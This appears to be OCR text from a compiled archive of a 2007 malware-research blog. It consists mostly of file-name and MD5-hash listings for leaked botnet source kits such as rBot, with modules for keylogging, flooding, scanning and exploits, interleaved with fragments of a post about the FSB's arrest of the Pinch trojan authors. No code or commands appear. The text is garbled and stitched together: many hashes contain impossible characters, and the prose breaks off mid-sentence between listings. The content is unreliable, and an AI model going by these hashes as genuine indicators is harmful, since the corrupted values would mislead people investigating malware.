da0492a87b10a88baa09e7e8330b2a0b 
Isass2.h 17e0f879e4ce5667c271cf2df3d97af0 
massasn.cpp 
858320bf874c5e0929597e721db2db51 
massasn.h 
9218d5e2b737c35a45d79a7d3907658a 
misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 
misc.h 
f035c1642a8e3ff49ff19bb1be316333 
ms04 007 _asnl.cpp 
8563b5de5c0e99c3dfdeca6cb89eaa67 
ms04 _007 _asnl.h 
c18cb0ec17923a63653974cbfb1dlecb 
net.cpp 
a1193f36f9bc058f9306fa922b957ed9 
net.h 
b1bb95c11a47aa666acd9a5929861726 
netapi.cpp 
767¢2b620c022d6146937baa51ffa4ac5 
netapi.h 6300dc4bf60d997941ef5627f284f526 
12370 


netutils.cpp 
7€91597¢24a39f15682b255dc78973d5 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 

nicklist.h 

e9eb7e67eb89f60039d17c3fc5609ab4 

passwd.h c300d3b2a40113092a84186424b56079 
pingudp.cpp 
8092a2919dab44410b1802c1b31ddc7a 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 

pnp.cpp 

18f3999fab36920d34e796adf6a5612d 

pnp.h 

a6ea8al2b4309238b675c82cc04c6438 
processes.cpp 
6ac678aaef/9bf7b4644c3eeaec45fb1 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 

psniff.cpp 

c4eb189f05d2a7ff6e52afeOcdab3bd17 

psniff.h 5eebe93de4e03bf0bb118e35997743a9 
random.cpp 
8bc91b1034498c24800651720e81aa5d 
random.h 89181196laae00fb762c7b242c29fc64 
rBot.cpp 804bdacbbc9da64ef0191737204d4813 
rBot.dsp 642fdc4flafc39cc822c5cca514b0965 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.h 

6d17278915220464f9502b8ce5451f67 

rBot.ncb 4723c4a0db502b05d3cO0b8ec7ada0edd 
rBot.opt 5c7739763d6f0d3d72342eae/7dcf2f47 
rBot.plg b538cd31f0e48b6c6645b62eb38e30f7 
rBot.sIn 7616db7c42a85a9409f2bb2eb68de83e 
rBot.suo O0fa064426f7932096a419d472448213d 
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rBot.vcproj 
64fa46097620fb63d479aO0cd5cad4f7d 
redirect.cpp 
dacd372119ae0ab1750b3e2f83382a52 
redirect.h 
9e5349d6d6944a179b9ca7a7d847c335 
remotecmd.cpp 
35014f60da50aef7b6a7al19ff893247a 
remotecmd.h 
1fb45492f87a66e34be6b4ca55b1cf86 
reqbuf.bin 
2d8fe918744e0f97f435f973d2af0be4 
rlogind.cpp 
2f26ca25770b2f22201d40541b1d9d29 
rlogind.h 
dbc479f2720ba03cb946419fbef774e0 
rndnick.cpp 
1a2ca37350424ebc8ece807afa055b72 
rndnick.h 
3cbe632d4ca6f152ca2a13bb1561d292 
sasser.cpp 
1fb775e0551413b6b3fdel79f818c4e5 
scan.cpp 66cOcfe5563eb8191fda0d9a6781acOf 
scan.h 
6236be771c0c88df937f75845a064f12 
secure.cpp 
0385d82f95182e40ed61329826da5934 
secure.h 231le3dd2ba09a8bbc039caf634e5306d 
session.cpp 
82e74c83142171a4998ca76b20b4177¢c 
session.h 
5f8¢353634b560052a5ebee5ef27ae32 
shellcode.cpp 
b16b4féaaf8a8c11822c931dc84f77d4 
shellcode.h 
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[3]The Nuclear Malware Kit 
[4]The Cyber Bot 
[5]The Black Sun Bot 


1. http: //www.secureworks.com/research/threats/pushdo/?threat=pushdo 
2. http: //ddanchev. blogspot .com/2007/03/botnet-communication-platforms. html 
3. http: //ddanchev. blogspot .com/2007/08/nuclear-malware-kit .htm 


. http: //ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample_20.htm 


In what looks like a populist move from my perspective, [1]the FSB, the successor of the KGB, 
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cal14f267b73bc867b075ca56f524d52e 
socks4.cpp 
7d9d022be20b4dca6a204f8c1e027dbb 
socks4.h b103f307ff02cd98fe2bfbecbd19c011 
sym06 _010.cpp 
93871169b31b9a269745d345c1e87404 
sym06 _010.h 
8092927570fd990f1c0063dc87d9d942 
synflood.cpp 
d860c99e49b7c19e49c61a21bafOfEe6b 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
sysinfo.cpp 
17375b805605f717739a8085be3f21f3 
sysinfo.h 
38774eadb5ba365df293ba4a222c4163 
tcpflood.cpp 
dd12816e442003152d2f65d42ce7eeb8 
tcpflood.h 
a9165cc828d623c51c297ec888803d9f 
tcpflood2.cpp 
65eaf8f6e8c69ed36fd175cc89d1644f 
tcpflood2.h 
f8307cc6251c3fce249a794314103804 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
tftpd.cpp 
5aa60a160190a16817f785bdd8b5ef6a 
tftpd.h 
01a889b931f69e44f3a9421e16c327bc 
threads.cpp 
cbe0ba8b50028430092c7f0e78841b71 
threads.h 
f1b57b9f58ff94af8d2adeec8e7839e6 
visit.cpp 
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27fb4f513a944ba46a905c796bce0c81 
visit.h 
766e4add98e2cb96bd37e87f4d9dfff9 
vncrooter.cpp 
0408a485ae2dd8e16e19ae945534cd06 
vncrooter.h 
b1b3696a947bdfc64a498247f1d0ce32 
wildcard.cpp 
8785f287656995d8621d455ac7e04ab7 
wildcard.h 
64fa15a50564415d397166c3d0aec0a6 
workstation.cpp 
2823dd8a969c824d91329a79385195db 
workstation.h 
d16ef3f05e153e67803fba8d67532dal 
advscan.cpp 
1d994b44bdd7961dcc019ccle4a90bae 
advscan.h 
d5bfa343e80c04d15d6d7b5e9ce92eef 
botkiller.cpp 
f0c6e234812b3d5269528d92c0dd07d5 
configs.h 
fd41eb4e5ac2941232001a799aeb8c36 
defines.h 
c7218b48fbe0425baa666dc891535d31 
externs.h 
f37853aa5e8a64ddccb35bd7699f166d 
functions.h 
f85dbebbbfallb2ba5abfc82fcc00a97 
globals.h 
0c7076f93955d70f29e0fba937eac55e 
includes.h 
£7491b80138d2b6cfe7e78d35e0e9cfd 
keylogger.cpp 

€569621c990b3 7affc9cf4b050f2df2e 
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loaddlls.cpp 
b780b4c9d260f0c75105a56241130el1f 
mssql.cpp 
cdd749c5fc949f4417fca6bd2415ed96 

rBot.cpp 3074d11dbe5538487935366a0d0a2128 
rBot.dsp 48f4c8e84a29697d273e8b4629de0824 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.h 

d9aad62fd7416c85e3aedba74c2d29f5 

rBot.ncb a45835c44463f06f8853f5a560b9b380 
rBot.opt 1e0a25dde4c635d59clfcadOla5bacc5 
rBot.plg 1bc002636918653eea580283d113a694 
rBot.sIn 7616db7c42a85a9409f2bb2eb68de83e 
rBot.suo O0fa064426f7932096a419d472448213d 
rBot.vcproj 
64fa46097620fb63d479aO0cd5cad4f7d 
reqbuf.bin 

2d8fe918744e0f97f435f973d2af0be4 
ehandler.obj 
4601e247780383f10130040eafe52f2b 
ehandler.sbr 

irc send.obj 
04229e7ac566254b2f1f8clcacb2faae 

irc send.sbr 

rBot.bsc 

9cfOf56eaa2b4d5cd6637ff6df53c3a5 

rBot.pdb 92a6402348749ab5afa54b9f51b21da3 
advscan.cpp 
1d994b44bdd7961dcc019ccle4a90bae 
advscan.h 
d5bfa343e80c04d15d6d7b5e9ce92eef 
botkiller.cpp 
f0c6e234812b3d5269528d92c0dd07d5 
botkiller.h 
f295ac974dd51ec105d5e41bf654dd2b 
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configs.h 
fd41eb4e5ac2941232001a799aeb8c36 
dcc.cpp 
df6eb61aabd547eal1a37f861a5061505 
dcc.h 
e€44c57141c37593156064072bd6570c2 
defines.h 
c7218b48fbe0425baa666dc891535d31 
download.cpp 
ae8f1b45d00f33fd3e73bef13b8fa726 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
5e666e1886a5501c6df8164d6b31ac74 
fphost.cpp 
38f780e74db3796f6404ff7e46c9ab12 
fphost.h 72b9b3d4234fcbc5da07695ae3483c1b 
ftpd.cpp fe0e976ff8513e75f36f7c3760f36014 
ftpd.h 
48a891506c957340b207b627105d7bb4 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
36adc001045103c3fd869c61ab75c768 
includes.h 
93b0ed4e725b8dddf7812cbbfee37248 
keylogger.cpp 
€569621c990b37affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 


loaddlls.cpp 
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c78da2348f410aeee3d65cd5ae241f0b 
loaddlls.h 
922342107354c1a1f475739fe4f48cf6 

misc.cpp 543acbf089d915d8cb6ad3e224833471 
misc.h 

ec49a854be2c763a8217ce88047de083 
mssql.cpp 
cdd749c5fc949f4417fca6bd2415ed96 

mssql.h 

91ec31043d91ec5b2ebad48f07b1lee4d 

net.cpp 

a1193f36f9bc058f9306fa922b957ed9 

net.h 

b1bb95c11a47aa666acd9a5929861726 
processes.cpp 
d23a779a3ba73974f1699ab600079117 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 

rBot.cpp 9b18e17ddd8e658fc9e2b330ef9f86e0 
rBot.dsp ae9c12f9595cc7ef24819755b4605903 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.h 

6d17278915220464f9502b8ce5451f67 
rBot.ncb ff559c5a17d88ac93f0e947a25d69f1c 
rBot.opt c36c9b45493a08edf5e35c270e683741 
rBot.plg 541eb3f348c4ac08a4bf9d071b7b9625 
rBot.sIn 7616db7c42a85a9409f2bb2eb68de83e 
rBot.suo O0fa064426f7932096a419d472448213d 
rBot.vcproj 
64fa46097620fb63d479a0cd5cad4f7d 
reqbuf.bin 
2d8fe918744e0f97f435f973d2af0be4 
rndnick.cpp 
90bd87e22c44ecOd0cbf7c62ff3e7a92 

rndnick.h 
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1a27a90aafb5e40aa93658c93b97e2ae 
session.cpp 
bae00dd13164894c98928afd0c0acle6 
session.h 
5f8¢353634b560052a5ebee5ef27ae32 
sysinfo.cpp 
cl1a679d9924eade44b3aebeaafalc533 
sysinfo.h 
3c1f3d273e2b87c7051183d18f72d602 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
threads.cpp 
17c45e0fc7cdf3ea6178639ede4868db 
threads.h 
f1b57b9f58ff94af8d2adeec8e7839e6 
advscan.obj 
19bdce55e4064b7426f90aab7756cde7 
advscan.sbr 

botkiller.obj 
ca0lcf9dda7f8eb914f6b6f922b837d1 
botkiller.sbr 

download.obj 
3b2453bdf439d0a95e74ec025f627789 
download.sbr 

ehandler.obj 
4601e247780383f10130040eafe52f2b 
ehandler.sbr 

fphost.obj 
0eac788ba54a2da88a70496d405610c1 
fphost.sbr 

ftpd.obj 
c58e819e7ddbd46d16596cb6dec59e0b 
ftpd.sbr 

irc send.obj 
04229e7ac566254b2f1f8clcacb2faae 
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irc send.sbr 
keylogger.obj 
3b658393615d4b9f2c2c80d3ee80alc8a 
keylogger.sbr 
loaddlls.obj 
1096f42aa34bea82da33d8cb65d2b4e9 
loaddlls.sbr 
misc.obj 
9a38222a751862c4723f8ed2a35d5699 
misc.sbr 
mssql.obj 
deb64937798a9937a95e48f863fb1008 
mssql.sbr 
net.obj 
81fbO0dcfbf4ed190b003af72f20c75b9 
net.sbr 
processes.obj 
a127a05529dbc003fafeO1lcaadc131e8 
processes.sbr 
rBot.bsc 
10b411328a22e6e095e17deebde484a8 
rBot.map b833beb2ed6021f94ff82052530b6a6c 
rBot.pch cf0b657fd4a010b2f09dc256399f1064 
rBot.pdb 56616101eb959a67b5fab5c796e73675 
rBot.sbr c9771le2eeef470859d1c920e791eed6c 
rndnick.obj 
€91304706c27953bbf865ffeab0c20c1 
rndnick.sbr 
session.obj 
5d816c0f7bf2a6b6a50882a7 9dee9Ff3 
session.sbr 
sysinfo.obj 
1e8328f2026a4bbd7293e8c9f290973a 
sysinfo.sbr 
threads.obj 
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ab3132bbdf76900a29b9759b3a9a902F 
threads.sbr 

vc60.idb 
c675774aedcc97d89163abb465f0ac72 
120.cpp 
126d09fbd00fc56bea738a338af585b6 
120.dsp 
20507d59fc0963fab727falae673eb11 
120.dsw 
ac5b003d9f3b7b3f613652b01e1c1454 
120.h 
b0ea6b82195207d090e6c24d61980c93 
120.ico 
clf0feb36e6cdfbf699525c72a683d0e 
120.ncb 
f456a98c9fda5517c2a68752036236ca 
120.opt 
a6b69716e4822b782dc361fb3cfbc2b0 
120.plg 
5b00257033278978d64faf73185ccd6éd 
120.rc 
e3d778e0ff3a77de7a3145a17626d740 
lreadme.txt 
5816c92688f435946cdb665f9c76a970 
Adv.cpp 
0c0b5c3e3ab3758c9a21e23c0dd676b3 
Adv.h 
087d0176e8cee3f1291d4b48b4e20479 
botkiller.cpp 
03c6b85198decd1ff8ccd782a8b6acfd4 
botkiller.h 
a71e71de8fb056658439934327df0ed0 
CleanUp.bat 
d1db23a544ee2f7bca4adc252dae33bf 
Cmd.h 

12380 


e73af685d00a799eedc313c0a8499ba6 
Conf.h 
cf12b3c6cbef00b529f3c85511947743 
Crc.cpp 
b8f60e826f3f161571d8e3f7b08465f5 
Crc.h 
024f7f17b3dac4091c5e80d032b98ec4 
Cry.cpp 
1a0f84756d5da53fefaf191f27457a7d 
Cry.h 
c49e198e5alc4f634d6f97002883c5bc 
d3des.c 
€259805a2bae810b780140dd388c1191 
d3des.h 
35cd1a965963d32df92f8087ff642cd1 
ddos.cpp a/bd4791b0388a510f8b3f66a1011e5e 
ddos.h 
11b29bda556a1770d027600fbb87dd55 
Def.h 
46fae457dd61317a89295e9506179851 
encrypt.exe 
€20f3260419d966d4393fac3ab17654c 
Ext.h 
5a3a677ec67170d0217d6037d1565a81 
ftpd.cpp Of7a382e1a22140304a6908dc2760651 
ftpd.h 
48a891506c957340b207b627105d7bb4 
Fun.h 
08a9e5038a76c9be299324b0757a8302 
Glo.h 
c96e029def5b6dal7307d935dbeafeee 
icmpflood.cpp 
9f5517830b89419f8c55da5f0b08424d 
icmpflood.h 
4462c6318220648820316848deb124fd 


12381 


Ide.cpp 

98dc154eab6153d133187eb189dfc7f3 

Ide.h 

0b892636d518555f5336a230e30cc906 

Inc.h 

ac099cOb8b6f4d24a66114363e9b080c 
Key.cpp 

16cdf4f8588d213c0celc6ec5544al14a 

Key.h 

Obf55d672ea6889bb0739329fc781208 
Ldil.cpp a99c9ff6ecbc05289c74e03b34d7c8fc 
Ldll.h 

€93576952251lef0ebc906c9f78eb629e 
passwd.h 50cee4baal6cb6a072ee6fa6114ff2de 


patcher.cpp 
8cd1760ea0ae3b8f82a8d06e82773c3c 
patcher.h 
70e1a30467b0f3b69ebe4661b518cfce 
pingudp.cpp 
392c0955449dae6c2467a2605add668a 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 
pstore.cpp 
6eb93ef5cb29c9b6394cf8c87a4debfa 
pstorec.tlh 
b89c05a4531df0fd30c67bfcecc62e01 
pstorec. tli 
92fdb3bb3207336cf4bb5bb64b6f0fa8 
rfb.h 
cf25478eafa82b934daa9e12e6ac46e2 
Rnd.cpp 


95475868f6c74ab83c2035falcf91372 

Rnd.h 

2b967ad91294cb6e516f472bd86405e6 

Shel.cpp £7c095545504e3a171c4b1la26d4ea055 
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have "Pinch-ED" the authors of the [2]DIY malware Pinch. A populist move mainly because 
the Russian Business Network is still 100 % fully operational, the Storm Worm botnet was 
originally launched and is currently controlled by Russian folks, and the lack of any kind of 
structured response on who was behind Estonia’s DDoS attack. [3]Pinch-ing the authors is 
one thing, pinch-ing everyone that’s now literally generating undetected pieces of malware 
through the use of the kit on an hourly basis is another : 


"Today Nikolay Patrushev, head of the Federal Security Services, announced the results of the 
measures taken to combat cyber crime in 2007. Among other information, it was announced 
that it had been established who was the author of the notorious Pinch Trojan - two Russian 
virus writers called Ermishkin and Farkhutdinov. The investigation will soon be completed and 
taken to court. The arrest of the Pinch authors is on a level with the arrests of other well known 
virus writers such as the author of NetSky and Sasser, and the authors of the Chernoby! and 
Melissa viruses." 


This event will get cheered be many, but those truly perceiving what’s going on the bottom 
line will consider the fact that fighting cybercrime isn’t a priority for the FSB, and perhaps even 
worse, they’re prioritizing in a awkward manner. [4]l once pointed out, and got quoted on the 
same idea in [5]a related research, that, Pandora’s box in the form of open source malware and 
[6]DIY malware builders is being opened by malware authors to let the script kiddies generate 
enough noise for them to remain undetected, and for everyone to benefit from those who 
enhance the effectiveness of the malware by coming up with new modifications for it. I’m still 
sticking to this statement. If the authors behind Pinch weren’t interested in reselling copies 
of the builder, but were keeping it to themselves, [7]thereby increasing its value, they would 
have been the average botnet masters in the eyes of the FSB, but now that the builder got sold 
and resold so many times | can count it as a public one, the authors compared to the users got 
the necessary attention. 


I’ll be covering Pinch in an upcoming post, mainly to debunk other such populist discoveries 
of Pinch in 2007, given that according to an encrypted screenshot of its stolen data crypter, 
and many other indicators, Pinch has been around since 2005, yes, exactly two ago. Why is 
this important? It’s important because if the industry is waking up on the concept of form- 
grabbing and TAN grabbing in respect to banking malware in 2007, the bad guys have been 
doing it for the last couple of years, whereas customers are finding it necessary to maintain 
another keychain entirely consisting of pseudo-random number generators pitched as layered 
authentication. The bad guys do not target the authentication process, or aim at breaking it - 
they bypass it as a point of engagement, efficiently. 
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Shel.h 
ea251b4beb6f7cceefa9bcc0d256f2c5b 
sniff.cpp 
1le2e1f28818edd4029e13993fd9eebca 
sniff.h 
5eebe93de4e03bf0bb118e35997743a9 
socks4.cpp 
76d4a2402672a728e1cc76062b13fd7a 
socks4.h b103f307ff0O2cd98fe2bfbecbd19c011 
Str.h 
b4f12d31353a70ba007bd6eee061720f 
synflood.cpp 
c61b1d1fabff3705c2df81093f72d3a7 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
Sys.cpp 
4c788567b4f66253009a563013a768e6 
Sys.h 
1¢327f8ff5f2a7053ef6a55bdec09781 
Tcp.h 
65281e657ace7f6ccd47f470ad100b5d 
tcpflood.cpp 
446953fc1d479001b8e2947e21f5966d 
tcpflood.h 
a9165cc828d623c51c297ec888803d9f 
tcpflood2.cpp 
72d9a1cc139450c3eacca0780b54e5b5 
tcpflood2.h 
aec74ba18c2502e78a761a0564087eed 
tcpip.h 
3464effd01374f2732b9c95252af9740 
Test.cpp 18d0756b38b7cf0Obd2fc19cafb8745c 
Test.h 
ea381ed0166cd1291e8bbf09b8b0250f 
Thr.cpp 
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1946ba69fc21c87d4f3f516413a3fb14 
Thr.h 
Obca4c661lace26fc79cb732d44943673 
ver.c 
96bc28bdb5f658224488715da4264095 
ver.h 
6620d6b2e364aa00c67d8f6ba2bd6872 
120.bak 
2ed3923a2bac11502a7ac4f3397386b2 
drxb.exe2 
66d3c4050df0de9c1257b81dd15c40a3 
pstorec.tlh 
b12315617f7b73d37d445e515edfd62d 
pstorec. tli 
cb05a644d5d5d943a70b13dcb0a7aff3 
mssql.cpp 
ecf38ff8f9c8b48d035albd14a9d38d4 
mssql.h 
742394ed531laab2ecc958daf5305723e 
Netapi.cpp 
79ddbc8d84d96ec83d328aa4f98ca4c7 
Netapi.h 14381a22f0b04e78d1513ebfbe76a805 
netbios.cpp 
d3fefc2b953a90c23d1fe78314793970 
netbios.h 
e027ed5a6f27598f67628a4ab33c82cd 
pstore.cpp 
c4456a4a2f27f36ff974533cafffbe60 
Sym.cpp 
23d55b1c2b78d6586e3efdc631dd51e8 
Sym.h 
ab712d424efc398db3bbea274487c096 
vncshit.cpp 

f77e664ea4f47 7cb3be9cb8ba5800f08 
vncshit.h 
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8363f5bedeb49d57a79f1739e2218eda 
Ad.cpp 
a757f554fcb1799a85f0acfb20b57b46 
Ad.h 
86f10b3675f39799e5ab82762ce6349d 
CleanUp.bat 
8206bb40d0fe345bc3b28fb5d9d8daal 
Cm.h 
f8bca155bb468901f5e26a6ec5cc427b 
Conf.h 
c5a365ea9ad06b415f3c562c4ce0b43a 
Crc.cpp 
3a743745dff18941ef8c2f7644635674 
Crc.h 
e62f6d81ffe06ca4dc5c799b79be9917 
Crypt.cpp 
8602a0364a5ef005e4b86678343e8b09 
Crypt.h 

De.h 
€97¢31c85339fb4b6b6b4cd132615b64 
Ex.h 
88625206ebb7aac45cde5f334c49fc6d 
Fu.h 
287f5a611lef5df21cbfb887dc3ab26e7 
Gl.h 
4d94bfd8d0b8a49e86291e3ed428d435 
Id.cpp 
12736bcd9713b7cf2eb5cf3cf562dalf 
Id.h 
6ac94946629ce7b943d7254307e86d24 
In.h 
442556b31fld3d604ef48aa51laa00d0e 
Ke.cpp 
88d8450db0b425e09e1927824272db51 
Ke.h 
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632e8ba8373fc0893f4799cC1682f4b71 
Ld.cpp 
dc3cc3643fbdd01329ccc54fdf29f2a8 
Ld.h 
7fec9032c8fal47e308cc288e9flfefO 
Ni.h 
880ab1f20b075357d323bf402771982e 
Pa.h 
clddd8e6bfde65f629518830e7d90ed8 
re.h 
5d6ab3265c76c3836abb8b5c16ac1221 
Rn.cpp 
70434773f9acd7642cdfc231lae4e40fc 
Rn.h 
€9e9bd9679159201d6274711580f131b 
RXB()tM()d.cpp 
da9c0505936c644c55abd45682cbaebb 
RXB()tM()d.dsp 
074a07479aee31334571b570aa095eed 
RXB()tM()d.dsw 
2ee34f05b8ecf804c2e39787e494319b 
RXB()tM()d.h 
f6413ddf94154e1aaa09bb110746adf1 
RXB()tM()d.ico 
76685dfa5860561a421b7acc5f5c37fb 
RXB()tM()d.ncb 

7e6fbd209a0fe3e67 76fdle4d7cff2cf 
RXB()tM()d.opt 
44173d402c55bea80f4d5035332e5d59 
RXB()tM()d.plg 
d82bdb15df9eab9e90462c0f94778cbc 
RXB()tM()d.rc 
cfd324dd8521158378ff2ccdbc009021 
Sh.cpp 


b47884c3fc2e02f4ce4c756ea3578c5a 
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Sh.h 
c668928adf9df5bcO0af91a9bb995daa9 
St.h 
467b4e8a9bac8416ad5a6054ba8d8bed 
Sy.cpp 
f7e311b21884ca2b8cb9fece8cOfb085 
Sy.h 
79168e2d1cbf138293cfbb72a345d996 
Sys.cpp 
2a3086eaf8713118dec7be42063a0ed3 
Sys.h 
f0ce91286fff5080c7e4c3161d561d3b 
Tc.h 
f9b973a1706d9d9955c7084cd3d4d15a 
Te.cpp 
a7446bc1f8b2b2d9e6f49e595e3921c7 
Te.h 
909592c1e841a166f94e9b8265a3c0c6 
Th.cpp 
e24b78fe0a613fbaf0dd1b9f460295cf 
Th.h 
e8c4ea682869ff97625e15d0233849a3 
encrypt.exe 
7d400a514eebececabc78541fe5cb5e4 
RXB()tM()d Commands.txt 
3ee5e2245d9a230fa0aec58b627635a7 
Asn.cpp 
dd209402b0738639be2c221ee50ace83 
Asn.h 
4394a58ea6964bf9a024335d05c9616e 
netapi.cpp 
98ea2e6bace66402c1a82ba2a0ea351d 


netapi.h 143ade77d66d913f5b1886c82cca43a2 


vnc.cpp 
49f8114154e768e0b0bc1b52e5416e46 
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vnc.h 
7a655f9bf17866fbc123cf6e51f59470 
advscan.cpp 
f864a7d86ac934be3e5689bcf27cde4b 
advscan.h 
c67d944559e747clee795c57fb616d8d 
aliaslog.cpp 
826a551d0689a4e0846977a91c5d0fe6 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
authors.txt 
5e70b680fcdafdbbd86d5b010dbb8b87 
autostart.cpp 
db2ce24b9bd3465f36b11f46f644a293 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
92917e1d8364a7f27fca0ce163c6337a 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
beagle.cpp 
45ca74ec0aa5d493533ea48bccc7f890 
beagle.h 76fa5d92efdffaadb93a416dc5ffbaf8 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd3labbe40c4 
cdkeys.cpp 
c98al12f271c0ee784673395994aa85a8 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
changes.txt 
e3878de97ecf8ce05054c0f7a9936c44 
configs.h 
81817e504207855146b81798e85b68f1 
crc32.cpp 
3771c5b3f6992c43c0e12a57c41la727e 
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crc32.h 
lcd0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
dameware.cpp 
f14a8d491f640cb67983ce00b78480d2 
dameware.h 
c5f45e22e790da8dd52d90dd4841b5c7 
dcc.cpp 
bc19d35982b17f731a59c62b1c14c84d 
dcc.h 
€44c57141c37593156064072bd6570c2 


dcom.cpp acea5e7fd1133f94c9e89756c5c0cc27 


dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
0ad20a541269c646caa86e8cef38d708 
dcom2.h 
€9548b20f8d3d955969a8b515b426db4 


ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 


ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
c1f8a75556a0d48ad8116f3e5af687b0 
download.cpp 

664845639 laff5fob872236bcb0af8b5 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
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7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
de46029aee975069ab6fb9ef3515c2b42 
findfile.cpp 
741923bfd8307db16d7b9befa400f1d0 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
1fecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 
fphost.h 72b69b3d4234fcbc5da07695ae3483cl1b 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
3b321d4bdc50573e2722291788667763 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f11be33 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
2393d490ebb3085e3e4098151a7f28a4 
irc send.cpp 
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6a084f0b44846cfbd50498b8b03687e3 
irc send.h 
30d0176a5e9b6e3e5al9bfb1lfcda444c 
keylogger.cpp 
€569621c990b3 7affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
kuang2.cpp 
ce5f0f4d470b760d2276fab309878420 
kuang2.h fc3343ecc92dba61f83260bbb93aa70c 
list.txt 50594305fa90c9596c69bel1ad1a454a4 
loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 
loaddlls.h 
4703f87679db3655151348076c41a83a 
Isass.cpp 
8434aa37522ff5971c0b67b66c720048 
Isass.h 
569113547489a68f47ba936087a9fcdb 
misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 
misc.h 
f035c1642a8e3ff49ff19bb1be316333 
mssqlI.cpp 
2ea31bdb396d29250fd6fédbdf231433 
mssqI.h 
742394ed531laab2ecc958daf5305723e 
mydoom.cpp 
cfcbabd00798a130fe0366975a9a0f50 
mydoom.h c7d0eda136c75da543c4al14f9c28b7d6 
myshellcode.asm 
ce26d85257d8fa2c68a5ad6012ed010c 
net.cpp 
a1193f36f9bc058f9306fa922b957ed9 
net.h 
b1bb95c11a47aa666acd9a5929861726 
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netbios.cpp 
904a4d19d94ab75dbe67e628831c0ef9 
netbios.h 
dd155768799804528c6cd19d67df42a3 
netdevil.cpp 
892dd8fd4a08ede457f9346b5edd832e 
netdevil.h 
a89982a588e965ce01448c60a81585b3 
netutils.cpp 
7€91597c24a39f15682b255dc78973d5 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
optix.cpp 
5ab6d1017b7380586127050009bec5a9 
optix.h 
3421ea53b60d9533328808627b869ccc 
passwd.h c300d3b2a40113092a84186424b56079 
peer2peer.cpp 
7fa712db3241c69112b7a853516ff0f5 
peer2peer.h 
920cce5177elfcaacdf28ec4aalc18b1 
pingudp.cpp 
8092a2919dab44410b1802c1b31ddc7a 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 
processes.cpp 
33c66b63b2f222b77437a32ab7a115cb 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 
psniff.cpp 
c4eb189f05d2a7ff652afeOcdab3bd17 
psniff.h 5eebe93de4e03bf0bb118e35997743a9 
rBot.cpp 215b552a4a12df16c2215b5208477a35 
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Don’t forget that a country that’s poised for [8]Jasymmetric warfare domination in the long- 
term, will tolerate any such asymmetric warfare capabilities in the form of botnets for instance, 
for as long as they’re not aimed at the homeland, in order for the country’s intell services to 
acquire either capabilities or "visionaries" by [9]diving deep into the HR pool available. The 
rest is [10]muppet show. 


1. http: //en.wikipedia.org/wiki/Federal_Security_Service_of_the_Russian_Federation 
2 
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rBot.dsp 22688a95ca24e6f8fbd4f8a606c006f2 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.h 

6d17278915220464f9502b8ce5451f67 
rBot.ncb be34f6éda38cccecc7d7f4b542dd88ea2 
rBot.opt b2be14b6d4a134d958732f8c2fc6a678 
rBot.plg 9a78359f287d2c2fd145082c7c984f6d 
redirect.cpp 
dacd372119ae0ab1750b3e2f83382a52 
redirect.h 
9e5349d6d6944a179b9ca7a7d847c335 
remotecmd.cpp 
35014f60da50aef7b6a7al19ff893247a 
remotecmd.h 
1fb45492f87a66e34be6b4ca55b1cf86 
reqbuf.bin 
2d8fe918744e0f97f435f973d2af0be4 
advscan.cpp 
d23473bd57e49ed3688ecb3dfe9dd55f 
advscan.h 
c67d944559e747clee795c57fb616d8d 
